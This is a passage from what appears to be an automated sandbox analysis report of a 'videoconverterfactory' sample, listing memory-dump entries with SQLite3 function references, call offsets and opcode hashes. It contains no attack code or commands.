                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                                      • String ID:
                                                                                                      • API String ID: 961572588-0
                                                                                                      • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                                      • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                                      • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                                      • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                                      • String ID: 2$foreign key$indexed
                                                                                                      • API String ID: 4126863092-702264400
                                                                                                      • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                                      • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                                      • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                                      • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                                      APIs
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                                                                      • sqlite3_step.SQLITE3 ref: 6094A73C
                                                                                                      • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                                                                      • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                                                                      • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                                                                        • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                                                                      • String ID:
                                                                                                      • API String ID: 2794791986-0
                                                                                                      • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                                      • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                                                                      • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                                      • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_stricmp
                                                                                                      • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                                      • API String ID: 912767213-1308749736
                                                                                                      • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                                      • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                                      • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                                      • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                                      APIs
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                                      • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                                      • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                                        • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                                      • String ID:
                                                                                                      • API String ID: 4082478743-0
                                                                                                      • Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                      • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                                      • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                      • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                                        • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                                        • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                                        • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                                      • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID: BINARY$INTEGER
                                                                                                      • API String ID: 317512412-1676293250
                                                                                                      • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                                      • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                                      • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                                      • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                                      APIs
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                                                                      • sqlite3_step.SQLITE3 ref: 6094B590
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                                                                      • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                                                                      • String ID:
                                                                                                      • API String ID: 2802900177-0
                                                                                                      • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                                      • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                                                                      • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                                      • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                                        • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                                        • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                                        • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                      • String ID:
                                                                                                      • API String ID: 4038589952-0
                                                                                                      • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                                      • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                                      • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                                      • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                                      APIs
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                      • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                        • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                      • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                                      • String ID:
                                                                                                      • API String ID: 247099642-0
                                                                                                      • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                                      • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                                      • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                                      • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                                      APIs
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                        • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                                        • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                      • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                                      • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                                        • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                                      • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                                      • String ID:
                                                                                                      • API String ID: 326482775-0
                                                                                                      • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                                      • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                                      • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                                      • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                                      APIs
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6094B71E
                                                                                                        • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                      • sqlite3_bind_int64.SQLITE3 ref: 6094B73C
                                                                                                      • sqlite3_step.SQLITE3 ref: 6094B74A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_bind_int64$sqlite3_mutex_leavesqlite3_step
                                                                                                      • String ID:
                                                                                                      • API String ID: 3305529457-0
                                                                                                      • Opcode ID: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                                      • Instruction ID: cea3564161c85327b61b62d60446574847d05a2bcfebeda4641ea5396b37aa5a
                                                                                                      • Opcode Fuzzy Hash: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                                      • Instruction Fuzzy Hash: D401A8B45047049FCB00DF19D9C968ABBE5FF98354F158869FC888B305D374E8548BA6
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1477753154-0
                                                                                                      • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                                      • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                                      • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                                      • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                                      APIs
                                                                                                        • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1465156292-0
                                                                                                      • Opcode ID: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                                      • Instruction ID: 19c4c58ecb434a21204d9b38047e93a23a7f28015e8477a734fda6841bb58fe8
                                                                                                      • Opcode Fuzzy Hash: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                                      • Instruction Fuzzy Hash: 56317AB4A082188FCB04DF69D880A8EBBF6FF99314F008559FC5897348D734D940CBA5
                                                                                                      APIs
                                                                                                        • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1465156292-0
                                                                                                      • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                                      • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                                      • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                                      • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                                      APIs
                                                                                                        • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
